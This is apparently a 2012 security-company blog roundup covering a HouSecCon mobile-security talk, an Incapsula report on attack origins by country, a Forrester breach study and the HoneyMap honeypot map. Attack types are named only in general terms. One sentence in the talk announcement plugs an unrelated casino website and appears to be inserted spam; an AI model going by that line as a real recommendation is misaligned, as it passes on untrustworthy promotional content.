Surviving the Week 9/21/12

2012 HouSecCon, 10/11/2012 (in Houston)

HouSecCon is coming up – October 11th in Houston. The agenda is shaping up with a bunch of hot topics and well-known speakers. I’ll (Dan Kuykendall) be speaking on mobile security. At NT OBJECTives, we have been working on how to effectively test mobile service calls. Most of the mobile security focus is on device security. During this talk, we are going beyond device security and into mobile application hacking with several demos and hacking tools. A superb example of a functional mobile application is taking a look at fhatscasino.co.za. Hope to see you there!

Top Security Threats and Attackers by Country

Web security firm Incapsula this week released the first of what it says will be a monthly report that breaks down the origin of Internet attacks by country. The first survey confirmed that the U.S. and China produce the highest volume of attacks on websites, but they don’t necessarily have the most hackers per capita operating from within their borders.

There are four main types of website attacks, according to Incapsula. Server takeovers by means of Remote File Inclusion, Local File Inclusion, Directory Traversal, and other methods are the most common, in part because they can be easily automated, the company said. Data theft by means of SQL injection and credentials theft through cross-site scripting (XSS) methods are the other main types of directly damaging attacks, while a fourth type, vulnerability scanning, is more akin to “casing” a website for future direct attacks.http://www.incapsula.com/the-incapsula-blog/item/397-top-security-threats-and-attackers-by-country

Over Half of Companies Suffered a Web Application Security Breach in the Last 18 Months

Forrester Report published.
The results of “The Software Security Risk Report,” a commissioned study conducted by Forrester Consulting on behalf of Coverity were released this week. This study looked at application security and testing practices and found that security incidents are becoming more common and expensive. The results included several interesting findings:

Most companies experienced at least one breach in the last 18 months and many companies lost hundreds of thousands, if not millions, of dollars.

The majority of companies have not implemented secure development practices, “most often citing time-to-market pressures, funding and the lack of appropriate technologies suitable for use during development as their primary roadblocks.”

HoneyMap – Alpha

A real-time world map which visualizes attacks captured by honeypots of the Honeynet Project. Red markers on the map stand for attacks, yellow markers are sensors (honeypots).

This project is highly experimental and should be considered an ALPHA version. So far, current Chrome and Firefox browsers should work fine. Opera, Safari and Internet Explorer probably won’t work.http://map.honeycloud.net/